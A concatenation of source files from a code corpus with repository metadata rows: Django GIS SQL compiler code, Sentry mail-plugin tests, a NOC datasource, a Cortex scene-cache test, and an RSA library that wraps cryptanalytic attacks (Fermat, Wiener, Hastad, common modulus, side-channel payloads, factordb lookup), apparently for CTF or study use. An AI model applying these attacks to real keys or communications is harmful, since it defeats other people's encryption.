        cls.temp_hyst_max = int(temp_hyst_max)

    @classmethod
    def set_hum_hyst_min(cls, hum_hyst_min):
        cls.hum_hyst_min = int(hum_hyst_min)

    @classmethod
    def set_hum_hyst_max(cls, hum_hyst_max):
        cls.hum_hyst_max = int(hum_hyst_max)
if __name__=='__main__':
    # Wire up the GPIO actuators, persist the current preferences, then
    # enter the blocking control loop.
    # NOTE(review): "safe_preferences" reads like a typo for
    # "save_preferences" -- defined elsewhere, verify against Growbox.
    Growbox.init_actuators()
    Growbox.safe_preferences()
    Growbox.main_loop()
| 31.321127 | 145 | 0.583596 |
0f4c1d4399d64377b2d90f689aecf24be86501fd | 12,877 | py | Python | django/contrib/gis/db/models/sql/compiler.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 3 | 2016-07-08T23:49:32.000Z | 2018-04-15T22:55:01.000Z | django/contrib/gis/db/models/sql/compiler.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 27 | 2017-02-05T15:57:04.000Z | 2018-04-15T22:57:26.000Z | django/contrib/gis/db/models/sql/compiler.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | null | null | null | from itertools import izip
from django.db.backends.util import truncate_name
from django.db.models.sql import compiler
from django.db.models.sql.constants import TABLE_NAME
from django.db.models.sql.query import get_proxied_model
SQLCompiler = compiler.SQLCompiler
class GeoSQLCompiler(compiler.SQLCompiler):
def get_columns(self, with_aliases=False):
    """
    Return the list of columns to use in the select statement. If no
    columns have been specified, returns all columns relating to fields in
    the model.
    If 'with_aliases' is true, any column names that are duplicated
    (without the table names) are given unique aliases. This is needed in
    some cases to avoid ambiguity with nested queries.
    This routine is overridden from Query to handle customized selection of
    geometry columns.
    """
    qn = self.quote_name_unless_alias
    qn2 = self.connection.ops.quote_name
    # Extra-select entries may carry a geometry wrapper registered in
    # query.custom_select (applied via get_extra_select_format).
    result = ['(%s) AS %s' % (self.get_extra_select_format(alias) % col[0], qn2(alias))
              for alias, col in self.query.extra_select.iteritems()]
    aliases = set(self.query.extra_select.keys())
    if with_aliases:
        col_aliases = aliases.copy()
    else:
        col_aliases = set()
    if self.query.select:
        only_load = self.deferred_to_columns()
        # This loop customized for GeoQuery: columns go through
        # get_field_select() so geometry fields can be wrapped.
        for col, field in izip(self.query.select, self.query.select_fields):
            if isinstance(col, (list, tuple)):
                alias, column = col
                table = self.query.alias_map[alias][TABLE_NAME]
                # Respect deferred loading: skip columns not requested.
                if table in only_load and col not in only_load[table]:
                    continue
                r = self.get_field_select(field, alias, column)
                if with_aliases:
                    if col[1] in col_aliases:
                        # Duplicate bare column name: invent a unique alias.
                        c_alias = 'Col%d' % len(col_aliases)
                        result.append('%s AS %s' % (r, c_alias))
                        aliases.add(c_alias)
                        col_aliases.add(c_alias)
                    else:
                        result.append('%s AS %s' % (r, qn2(col[1])))
                        aliases.add(r)
                        col_aliases.add(col[1])
                else:
                    result.append(r)
                    aliases.add(r)
                    col_aliases.add(col[1])
            else:
                # Non-(alias, column) entries know how to render themselves.
                result.append(col.as_sql(qn, self.connection))
                if hasattr(col, 'alias'):
                    aliases.add(col.alias)
                    col_aliases.add(col.alias)
    elif self.query.default_cols:
        cols, new_aliases = self.get_default_columns(with_aliases,
                                                     col_aliases)
        result.extend(cols)
        aliases.update(new_aliases)
    max_name_length = self.connection.ops.max_name_length()
    result.extend([
        '%s%s' % (
            self.get_extra_select_format(alias) % aggregate.as_sql(qn, self.connection),
            alias is not None
            and ' AS %s' % qn(truncate_name(alias, max_name_length))
            or ''
        )
        for alias, aggregate in self.query.aggregate_select.items()
    ])
    # This loop customized for GeoQuery: related (select_related) columns
    # also go through get_field_select().
    for (table, col), field in izip(self.query.related_select_cols, self.query.related_select_fields):
        r = self.get_field_select(field, table, col)
        if with_aliases and col in col_aliases:
            c_alias = 'Col%d' % len(col_aliases)
            result.append('%s AS %s' % (r, c_alias))
            aliases.add(c_alias)
            col_aliases.add(c_alias)
        else:
            result.append(r)
            aliases.add(r)
            col_aliases.add(col)
    self._select_aliases = aliases
    return result
def get_default_columns(self, with_aliases=False, col_aliases=None,
                        start_alias=None, opts=None, as_pairs=False, local_only=False):
    """
    Computes the default columns for selecting every field in the base
    model. Will sometimes be called to pull in related models (e.g. via
    select_related), in which case "opts" and "start_alias" will be given
    to provide a starting point for the traversal.
    Returns a list of strings, quoted appropriately for use in SQL
    directly, as well as a set of aliases used in the select statement (if
    'as_pairs' is True, returns a list of (alias, col_name) pairs instead
    of strings as the first component and None as the second component).
    This routine is overridden from Query to handle customized selection of
    geometry columns.
    """
    result = []
    if opts is None:
        opts = self.query.model._meta
    aliases = set()
    only_load = self.deferred_to_columns()
    # Skip all proxy to the root proxied model
    proxied_model = get_proxied_model(opts)
    if start_alias:
        seen = {None: start_alias}
    for field, model in opts.get_fields_with_model():
        if local_only and model is not None:
            continue
        if start_alias:
            try:
                alias = seen[model]
            except KeyError:
                if model is proxied_model:
                    alias = start_alias
                else:
                    # Join up to the ancestor that actually owns the field.
                    link_field = opts.get_ancestor_link(model)
                    alias = self.query.join((start_alias, model._meta.db_table,
                                             link_field.column, model._meta.pk.column))
                seen[model] = alias
        else:
            # If we're starting from the base model of the queryset, the
            # aliases will have already been set up in pre_sql_setup(), so
            # we can save time here.
            alias = self.query.included_inherited_models[model]
        table = self.query.alias_map[alias][TABLE_NAME]
        if table in only_load and field.column not in only_load[table]:
            continue
        if as_pairs:
            result.append((alias, field.column))
            aliases.add(alias)
            continue
        # This part of the function is customized for GeoQuery. We
        # see if there was any custom selection specified in the
        # dictionary, and set up the selection format appropriately.
        field_sel = self.get_field_select(field, alias)
        if with_aliases and field.column in col_aliases:
            c_alias = 'Col%d' % len(col_aliases)
            result.append('%s AS %s' % (field_sel, c_alias))
            col_aliases.add(c_alias)
            aliases.add(c_alias)
        else:
            r = field_sel
            result.append(r)
            aliases.add(r)
            if with_aliases:
                col_aliases.add(field.column)
    return result, aliases
def resolve_columns(self, row, fields=()):
    """
    This routine is necessary so that distances and geometries returned
    from extra selection SQL get resolved appropriately into Python
    objects.
    """
    values = []
    aliases = self.query.extra_select.keys()
    if self.query.aggregates:
        # If we have an aggregate annotation, must extend the aliases
        # so their corresponding row values are included.
        aliases.extend([None for i in xrange(len(self.query.aggregates))])
    # Have to set a starting row number offset that is used for
    # determining the correct starting row index -- needed for
    # doing pagination with Oracle.
    rn_offset = 0
    if self.connection.ops.oracle:
        if self.query.high_mark is not None or self.query.low_mark: rn_offset = 1
    index_start = rn_offset + len(aliases)
    # Converting any extra selection values (e.g., geometries and
    # distance objects added by GeoQuerySet methods).
    values = [self.query.convert_values(v,
                self.query.extra_select_fields.get(a, None),
                self.connection)
              for v, a in izip(row[rn_offset:index_start], aliases)]
    if self.connection.ops.oracle or getattr(self.query, 'geo_values', False):
        # We resolve the rest of the columns if we're on Oracle or if
        # the `geo_values` attribute is defined.
        # (Python 2 idiom: map(None, a, b) zips with None padding.)
        for value, field in map(None, row[index_start:], fields):
            values.append(self.query.convert_values(value, field, connection=self.connection))
    else:
        values.extend(row[index_start:])
    return tuple(values)
#### Routines unique to GeoQuery ####
def get_extra_select_format(self, alias):
    """Return the wrapper format string registered for the extra-select
    column `alias` in query.custom_select, or a plain '%s' passthrough
    when no custom selection applies."""
    custom = self.query.custom_select
    if alias in custom:
        return '%s' % custom[alias]
    return '%s'
def get_field_select(self, field, alias=None, column=None):
    """
    Returns the SELECT SQL string for the given field. Figures out
    if any custom selection SQL is needed for the column The `alias`
    keyword may be used to manually specify the database table where
    the column exists, if not in the model associated with this
    `GeoQuery`. Similarly, `column` may be used to specify the exact
    column name, rather than using the `column` attribute on `field`.
    """
    fmt = self.get_select_format(field)
    custom = self.query.custom_select
    if field in custom:
        return fmt % custom[field]
    return fmt % self._field_column(field, alias, column)
def get_select_format(self, fld):
    """
    Returns the selection format string, depending on the requirements
    of the spatial backend. For example, Oracle and MySQL require custom
    selection formats in order to retrieve geometries in OGC WKT. For all
    other fields a simple '%s' format string is returned.
    """
    # `connection.ops.select` is the backend's geometry-select wrapper;
    # only geometry fields (those with geom_type) need it.
    if self.connection.ops.select and hasattr(fld, 'geom_type'):
        # This allows operations to be done on fields in the SELECT,
        # overriding their values -- used by the Oracle and MySQL
        # spatial backends to get database values as WKT, and by the
        # `transform` method.
        sel_fmt = self.connection.ops.select
        # Because WKT doesn't contain spatial reference information,
        # the SRID is prefixed to the returned WKT to ensure that the
        # transformed geometries have an SRID different than that of the
        # field -- this is only used by `transform` for Oracle and
        # SpatiaLite backends.
        if self.query.transformed_srid and ( self.connection.ops.oracle or
                                             self.connection.ops.spatialite ):
            sel_fmt = "'SRID=%d;'||%s" % (self.query.transformed_srid, sel_fmt)
    else:
        sel_fmt = '%s'
    return sel_fmt
# Private API utilities, subject to change.
def _field_column(self, field, table_alias=None, column=None):
    """
    Helper function that returns the database column for the given field.
    The table and column are returned (quoted) in the proper format, e.g.,
    `"geoapp_city"."point"`. If `table_alias` is not specified, the
    database table associated with the model of this `GeoQuery` will be
    used. If `column` is specified, it will be used instead of the value
    in `field.column`.
    """
    if table_alias is None:
        table_alias = self.query.model._meta.db_table
    quoted_table = self.quote_name_unless_alias(table_alias)
    quoted_column = self.connection.ops.quote_name(column or field.column)
    return "%s.%s" % (quoted_table, quoted_column)
# Geometry-aware variants of the stock SQL compilers: all behavior comes
# from mixing GeoSQLCompiler in ahead of the standard implementation.
class SQLInsertCompiler(compiler.SQLInsertCompiler, GeoSQLCompiler):
    pass
class SQLDeleteCompiler(compiler.SQLDeleteCompiler, GeoSQLCompiler):
    pass
class SQLUpdateCompiler(compiler.SQLUpdateCompiler, GeoSQLCompiler):
    pass
class SQLAggregateCompiler(compiler.SQLAggregateCompiler, GeoSQLCompiler):
    pass
class SQLDateCompiler(compiler.SQLDateCompiler, GeoSQLCompiler):
    pass
| 46.154122 | 107 | 0.578318 |
483f2072e600e60a0b7b669a6aa27e9f9fa59e34 | 4,010 | py | Python | CryptoLib/RSA/RSA.py | J-SB/ModernCryptoLib | 7f3532933933a4c558d5ba25bdbb8e9cb8d06819 | [
"MIT"
] | 12 | 2018-02-16T21:37:00.000Z | 2022-02-23T03:19:57.000Z | CryptoLib/RSA/RSA.py | J-SB/ModernCryptoLib | 7f3532933933a4c558d5ba25bdbb8e9cb8d06819 | [
"MIT"
] | 1 | 2020-10-08T14:11:16.000Z | 2020-10-08T14:11:16.000Z | CryptoLib/RSA/RSA.py | J-SB/ModernCryptoLib | 7f3532933933a4c558d5ba25bdbb8e9cb8d06819 | [
"MIT"
] | 5 | 2018-02-16T21:37:02.000Z | 2020-10-08T05:08:24.000Z | class utilities:
# Thin, lazily-importing wrappers around the project's
# RSA_Attacks.utilities number-theory helpers.
@staticmethod
def egcd(a,b):
    from RSA_Attacks.utilities import egcd
    return egcd(a,b)
@staticmethod
def modinv(a,m):
    from RSA_Attacks.utilities import modinv
    return modinv(a,m)
@staticmethod
def mulinv(a,b):
    from RSA_Attacks.utilities import mulinv
    return mulinv(a,b)
@staticmethod
def powinv(x,n):
    from RSA_Attacks.utilities import powinv
    return powinv(x,n)
@staticmethod
def rational_to_contfrac (x, y):
    # Continued-fraction expansion of x/y -- presumably used by the
    # Wiener attack; see RSA_Attacks.utilities.
    from RSA_Attacks.utilities import rational_to_contfrac
    return rational_to_contfrac (x, y)
@staticmethod
def convergents_from_contfrac(frac):
    # Delegate to the RSA_Attacks helper.
    # BUGFIX: the original returned the imported function object itself
    # (`return convergents_from_contfrac`) instead of calling it with
    # `frac`, unlike every sibling wrapper in this class.
    from RSA_Attacks.utilities import convergents_from_contfrac
    return convergents_from_contfrac(frac)
# More lazily-importing delegation wrappers for RSA_Attacks.utilities.
@staticmethod
def contfrac_to_rational (frac):
    from RSA_Attacks.utilities import contfrac_to_rational
    return contfrac_to_rational (frac)
@staticmethod
def is_perfect_square(n):
    from RSA_Attacks.utilities import is_perfect_square
    return is_perfect_square(n)
@staticmethod
def isqrt(n):
    from RSA_Attacks.utilities import isqrt
    return isqrt(n)
class attacks:
    """Facade over the RSA_Attacks package: each static method lazily
    imports and runs one well-known RSA attack implementation."""
    @staticmethod
    def Fermat(n,limit=9999):
        # Fermat factorization of n, bounded by `limit` iterations.
        from RSA_Attacks.fermet import fermat
        return fermat(n,limit)
    @staticmethod
    def MultiPrime(primes_array,n,e,c):
        from RSA_Attacks.multiPrime import multiPrime
        return multiPrime(primes_array,n,e,c)
    @staticmethod
    def Common_modulus(chipher_text_1, chipher_text_2, e1, e2, n):
        # Two ciphertexts of the same message under one modulus n.
        from RSA_Attacks.common_modulus import common_modulus
        return common_modulus(chipher_text_1, chipher_text_2, e1, e2, n)
    @staticmethod
    def Chinese_remainder_theorem(p,q,dp,dq,chipher_text):
        # Decrypt via CRT components dp/dq given the prime factors.
        from RSA_Attacks.chinese_remainder_theorem import chinese_remainder_theorem
        return chinese_remainder_theorem(p,q,dp,dq,chipher_text)
    @staticmethod
    def Wiener(n,e):
        # Wiener's continued-fraction attack (small private exponent).
        from RSA_Attacks.wiener import wiener
        return wiener(n,e)
    @staticmethod
    def Hasted(n1,n2,n3,chipher_text_1,chipher_text_2,chipher_text_3,e):
        # Broadcast attack: one message, three moduli, small e.
        from RSA_Attacks.hasted import hasted
        return hasted(n1,n2,n3,chipher_text_1,chipher_text_2,chipher_text_3,e)
    @staticmethod
    def Gen_sideChannel_payload(n,c,e):
        from RSA_Attacks.side_channel import gen_sideChannel_payload
        return gen_sideChannel_payload(n,c,e)
    @staticmethod
    def Reverse_sideChannel_payload(payload):
        from RSA_Attacks.side_channel import reverse_sideChannel_payload
        return reverse_sideChannel_payload(payload)
    @staticmethod
    def Factordb(n):
        # Look n up on factordb and return the known factor list.
        from RSA_Attacks.factordb import FactorDB
        f = FactorDB(n)
        f.connect()
        return f.get_factor_list()
class calculate:
    """Helpers for deriving RSA key components from the primes p and q."""

    @staticmethod
    def phi(p, q):
        """Euler's totient of n = p*q for distinct primes p and q."""
        return (p - 1) * (q - 1)

    @staticmethod
    def d(p, q, e):
        """Private exponent: the modular inverse of e modulo phi(p, q)."""
        from RSA_Attacks.utilities import modinv
        totient = calculate.phi(p, q)
        return modinv(e, totient)
class convert:
    # NOTE(review): Python 2 only -- relies on `long` and on
    # str.decode("hex"), neither of which exists on Python 3.
    @staticmethod
    def hex_to_decimal(data_bytes):
        # Parse a hexadecimal string as an integer.
        return long(data_bytes,16)
    @staticmethod
    def base64_to_decimal(b64_string):
        # Decode base64, then parse the result as hex digits.
        # NOTE(review): only valid when the base64 payload itself encodes a
        # hex string -- confirm against the callers.
        from base64 import b64decode
        return convert.hex_to_decimal( b64decode(b64_string) )
    @staticmethod
    def decimal_to_text(number):
        # Render the integer as hex, then decode the hex digits to text.
        # NOTE(review): an odd-length hex representation makes
        # decode("hex") raise -- no padding is applied here.
        number = format(int(number), 'x')
        return str(number).decode("hex")
def KeyParser(path):
    """Load an RSA key (PEM/DER) from `path` via PyCrypto's importKey.

    Uses a context manager so the file handle is closed deterministically;
    the original `open(path, "r").read()` left closing to the garbage
    collector.
    """
    from Crypto.PublicKey import RSA
    with open(path, "r") as key_file:
        return RSA.importKey(key_file.read())
class export:
    """Build exportable key blobs from raw RSA integer components."""
    @staticmethod
    def public_key(n,e):
        # NOTE(review): prints the exported key (Python 2 print statement)
        # and returns None, while private_key below RETURNS its result --
        # confirm this asymmetry is intentional.
        from Crypto.PublicKey import RSA
        print RSA.construct((long(n), long(e))).exportKey()
    @staticmethod
    def private_key(n,e,d,p=None,q=None):
        # Include the prime factors when both are supplied; otherwise
        # construct the key from (n, e, d) alone.
        from Crypto.PublicKey import RSA
        if q != None and p != None:
            return RSA.construct((long(n), long(e) ,long(d) ,long(p),long(q))).exportKey()
        else:
            return RSA.construct((long(n), long(e) ,long(d))).exportKey()
| 32.08 | 91 | 0.685287 |
ab4a74e36c7925b14a45caa6f6fe4bcd7664a339 | 3,236 | py | Python | test/IECoreScene/SharedSceneInterfacesTest.py | ericmehl/cortex | 054839cc709ce153d1bcaaefe7f340ebe641ec82 | [
"BSD-3-Clause"
] | 386 | 2015-01-02T11:10:43.000Z | 2022-03-10T15:12:20.000Z | test/IECoreScene/SharedSceneInterfacesTest.py | ericmehl/cortex | 054839cc709ce153d1bcaaefe7f340ebe641ec82 | [
"BSD-3-Clause"
] | 484 | 2015-01-09T18:28:06.000Z | 2022-03-31T16:02:04.000Z | test/IECoreScene/SharedSceneInterfacesTest.py | ericmehl/cortex | 054839cc709ce153d1bcaaefe7f340ebe641ec82 | [
"BSD-3-Clause"
] | 99 | 2015-01-28T23:18:04.000Z | 2022-03-27T00:59:39.000Z | ##########################################################################
#
# Copyright (c) 2019, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import functools
import os
import IECoreScene
class SharedSceneInterfacesTest( unittest.TestCase ) :
    """Exercises the SharedSceneInterfaces cache size limit."""

    def setUp( self ) :
        # Remember the current limit and restore it after each test.
        # CLEANUP: addCleanup already accepts ( callable, *args ), so the
        # functools.partial wrapper used originally was redundant.
        maxScenes = IECoreScene.SharedSceneInterfaces.getMaxScenes()
        self.addCleanup( IECoreScene.SharedSceneInterfaces.setMaxScenes, maxScenes )

    def testLimits( self ) :
        IECoreScene.SharedSceneInterfaces.clear()
        self.assertEqual( IECoreScene.SharedSceneInterfaces.numScenes(), 0 )
        # Get more files than there is room for in the cache.
        files = [
            os.path.join( "test", "IECore", "data", "sccFiles", "animatedSpheres.scc" ),
            os.path.join( "test", "IECore", "data", "sccFiles", "attributeAtRoot.scc" ),
            os.path.join( "test", "IECore", "data", "sccFiles", "cube_v6.scc" ),
        ]
        IECoreScene.SharedSceneInterfaces.setMaxScenes( len( files ) - 1 )
        scenes = set()
        for f in files :
            scenes.add( IECoreScene.SharedSceneInterfaces.get( f ) )
        # Check that the cache limit wasn't exceeded.
        self.assertEqual( len( scenes ), len( files ) )
        self.assertEqual( IECoreScene.SharedSceneInterfaces.numScenes(), IECoreScene.SharedSceneInterfaces.getMaxScenes() )
        # Get all files again. This should result in being given at
        # least one new interface, due to cache evictions.
        for f in files :
            scenes.add( IECoreScene.SharedSceneInterfaces.get( f ) )
        self.assertGreater( len( scenes ), len( files ) )
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
| 38.52381 | 117 | 0.699629 |
8fdc11da2ffbfc6a5379bebb23e4079215634750 | 839 | py | Python | services/datasource/datasources/ch_workflow.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | services/datasource/datasources/ch_workflow.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | services/datasource/datasources/ch_workflow.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# CHWorkflow datasource
# ----------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Python modules
from __future__ import absolute_import
from pymongo import ReadPreference
# NOC modules
from .base import BaseDataSource
from noc.wf.models.workflow import Workflow
class CHWorkflowDataSource(BaseDataSource):
    """Extracts Workflow records for the "ch_workflow" datasource."""
    name = "ch_workflow"
    def extract(self):
        # Read from a secondary replica where possible to keep load off the
        # primary; order by id so extraction is deterministic.
        for a in (
            Workflow.objects.filter(read_preference=ReadPreference.SECONDARY_PREFERRED)
            .all()
            .order_by("id")
        ):
            # Row layout: (bi_id, id, name, is_active as 0/1).
            yield (a.bi_id, a.id, a.name, int(a.is_active))
c832e2d2d4d58c651fcdef05e8a75f935d05929c | 23,186 | py | Python | tests/sentry/plugins/mail/tests.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/plugins/mail/tests.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 1 | 2019-03-13T06:05:24.000Z | 2019-03-13T06:05:24.000Z | tests/sentry/plugins/mail/tests.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from datetime import datetime
import mock
import pytz
import six
from django.contrib.auth.models import AnonymousUser
from django.core import mail
from django.utils import timezone
from exam import fixture
from mock import Mock
from sentry.api.serializers import (
serialize,
UserReportWithGroupSerializer,
)
from sentry.digests.notifications import build_digest, event_to_record
from sentry.interfaces.stacktrace import Stacktrace
from sentry.models import (
Activity, Event, Group, GroupSubscription, OrganizationMember, OrganizationMemberTeam,
ProjectOwnership, Rule, UserOption, UserReport
)
from sentry.ownership.grammar import Owner, Matcher, dump_schema
from sentry.plugins import Notification
from sentry.plugins.sentry_mail.activity.base import ActivityEmail
from sentry.plugins.sentry_mail.models import MailPlugin
from sentry.testutils import TestCase
from sentry.utils.email import MessageBuilder
from sentry.event_manager import EventManager
class MailPluginTest(TestCase):
@fixture
def plugin(self):
    # Plugin instance under test (exam @fixture property).
    return MailPlugin()
@mock.patch(
    'sentry.models.ProjectOption.objects.get_value', Mock(side_effect=lambda p, k, d: d)
)
@mock.patch(
    'sentry.plugins.sentry_mail.models.MailPlugin.get_sendable_users', Mock(return_value=[])
)
def test_should_notify_no_sendable_users(self):
    # With project options at their defaults and no users to mail,
    # the plugin must decline to notify.
    assert not self.plugin.should_notify(group=Mock(), event=Mock())
def test_simple_notification(self):
    group = self.create_group(message='Hello world')
    event = self.create_event(group=group, message='Hello world', tags={'level': 'error'})
    rule = Rule.objects.create(project=self.project, label='my rule')
    notification = Notification(event=event, rule=rule)
    # Run the queued mail task synchronously so outbox is populated.
    with self.options({'system.url-prefix': 'http://example.com'}), self.tasks():
        self.plugin.notify(notification)
    msg = mail.outbox[0]
    # Subject carries the group short id; the HTML body names the rule.
    assert msg.subject == '[Sentry] BAR-1 - Hello world'
    assert 'my rule' in msg.alternatives[0][0]
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_notify_users_renders_interfaces_with_utf8(self, _send_mail):
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
)
stacktrace = Mock(spec=Stacktrace)
stacktrace.to_email_html.return_value = u'רונית מגן'
stacktrace.get_title.return_value = 'Stacktrace'
event = Event()
event.group = group
event.project = self.project
event.message = 'hello world'
event.interfaces = {'stacktrace': stacktrace}
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
stacktrace.get_title.assert_called_once_with()
stacktrace.to_email_html.assert_called_once_with(event)
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_notify_users_renders_interfaces_with_utf8_fix_issue_422(self, _send_mail):
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
)
stacktrace = Mock(spec=Stacktrace)
stacktrace.to_email_html.return_value = u'רונית מגן'
stacktrace.get_title.return_value = 'Stacktrace'
event = Event()
event.group = group
event.project = self.project
event.message = 'Soubor ji\xc5\xbe existuje'
event.interfaces = {'stacktrace': stacktrace}
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
stacktrace.get_title.assert_called_once_with()
stacktrace.to_email_html.assert_called_once_with(event)
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_notify_users_does_email(self, _send_mail):
event_manager = EventManager({
'message': 'hello world',
'level': 'error',
})
event_manager.normalize()
event_data = event_manager.get_data()
event_type = event_manager.get_event_type()
event_data['type'] = event_type.key
event_data['metadata'] = event_type.get_metadata(event_data)
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
message=event_manager.get_search_message(),
logger='root',
short_id=2,
data={
'type': event_type.key,
'metadata': event_type.get_metadata(event_data),
}
)
event = Event(
group=group,
message=group.message,
project=self.project,
datetime=group.last_seen,
data=event_data
)
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
assert _send_mail.call_count is 1
args, kwargs = _send_mail.call_args
self.assertEquals(kwargs.get('project'), self.project)
self.assertEquals(kwargs.get('reference'), group)
assert kwargs.get('subject') == u'BAR-2 - hello world'
@mock.patch('sentry.plugins.sentry_mail.models.MailPlugin._send_mail')
def test_multiline_error(self, _send_mail):
event_manager = EventManager({
'message': 'hello world\nfoo bar',
'level': 'error',
})
event_manager.normalize()
event_data = event_manager.get_data()
event_type = event_manager.get_event_type()
event_data['type'] = event_type.key
event_data['metadata'] = event_type.get_metadata(event_data)
group = Group(
id=2,
first_seen=timezone.now(),
last_seen=timezone.now(),
project=self.project,
message=event_manager.get_search_message(),
logger='root',
short_id=2,
data={
'type': event_type.key,
'metadata': event_type.get_metadata(event_data),
}
)
event = Event(
group=group,
message=group.message,
project=self.project,
datetime=group.last_seen,
data=event_data,
)
notification = Notification(event=event)
with self.options({'system.url-prefix': 'http://example.com'}):
self.plugin.notify(notification)
assert _send_mail.call_count is 1
args, kwargs = _send_mail.call_args
assert kwargs.get('subject') == u'BAR-2 - hello world'
def test_get_sendable_users(self):
from sentry.models import UserOption, User
user = self.create_user(email='foo@example.com', is_active=True)
user2 = self.create_user(email='baz@example.com', is_active=True)
self.create_user(email='baz2@example.com', is_active=True)
# user with inactive account
self.create_user(email='bar@example.com', is_active=False)
# user not in any groups
self.create_user(email='bar2@example.com', is_active=True)
organization = self.create_organization(owner=user)
team = self.create_team(organization=organization)
project = self.create_project(name='Test', teams=[team])
OrganizationMemberTeam.objects.create(
organizationmember=OrganizationMember.objects.get(
user=user,
organization=organization,
),
team=team,
)
self.create_member(user=user2, organization=organization, teams=[team])
# all members
assert (sorted(set([user.pk, user2.pk])) == sorted(self.plugin.get_sendable_users(project)))
# disabled user2
UserOption.objects.create(key='mail:alert', value=0, project=project, user=user2)
assert user2.pk not in self.plugin.get_sendable_users(project)
user4 = User.objects.create(username='baz4', email='bar@example.com', is_active=True)
self.create_member(user=user4, organization=organization, teams=[team])
assert user4.pk in self.plugin.get_sendable_users(project)
# disabled by default user4
uo1 = UserOption.objects.create(
key='subscribe_by_default', value='0', project=project, user=user4
)
assert user4.pk not in self.plugin.get_sendable_users(project)
uo1.delete()
UserOption.objects.create(
key='subscribe_by_default', value=u'0', project=project, user=user4
)
assert user4.pk not in self.plugin.get_sendable_users(project)
def test_notify_users_with_utf8_subject(self):
    # Non-ASCII event messages must survive into the mail subject intact.
    group = self.create_group(message='Hello world')
    event = self.create_event(group=group, message=u'רונית מגן', tags={'level': 'error'})
    notification = Notification(event=event)
    with self.options({'system.url-prefix': 'http://example.com'}), self.tasks():
        self.plugin.notify(notification)
    assert len(mail.outbox) == 1
    msg = mail.outbox[0]
    assert msg.subject == u'[Sentry] BAR-1 - רונית מגן'
def test_get_digest_subject(self):
    # Digest subject: short id, group count, and formatted start time.
    assert self.plugin.get_digest_subject(
        mock.Mock(qualified_short_id='BAR-1'),
        {mock.sentinel.group: 3},
        datetime(2016, 9, 19, 1, 2, 3, tzinfo=pytz.utc),
    ) == 'BAR-1 - 1 new alert since Sept. 19, 2016, 1:02 a.m. UTC'
@mock.patch.object(MailPlugin, 'notify', side_effect=MailPlugin.notify, autospec=True)
def test_notify_digest(self, notify):
    # A multi-event digest goes out as one digest mail and never falls
    # back to the per-event notify() path.
    project = self.event.project
    rule = project.rule_set.all()[0]
    digest = build_digest(
        project,
        (
            event_to_record(self.create_event(group=self.create_group()), (rule, )),
            event_to_record(self.event, (rule, )),
        ),
    )
    with self.tasks():
        self.plugin.notify_digest(project, digest)
    # FIX: the original `assert ... is 0` compared identity with an int
    # literal, which only works because of CPython small-int caching.
    assert notify.call_count == 0
    assert len(mail.outbox) == 1
    message = mail.outbox[0]
    assert 'List-ID' in message.message()
@mock.patch.object(MailPlugin, 'notify', side_effect=MailPlugin.notify, autospec=True)
@mock.patch.object(MessageBuilder, 'send_async', autospec=True)
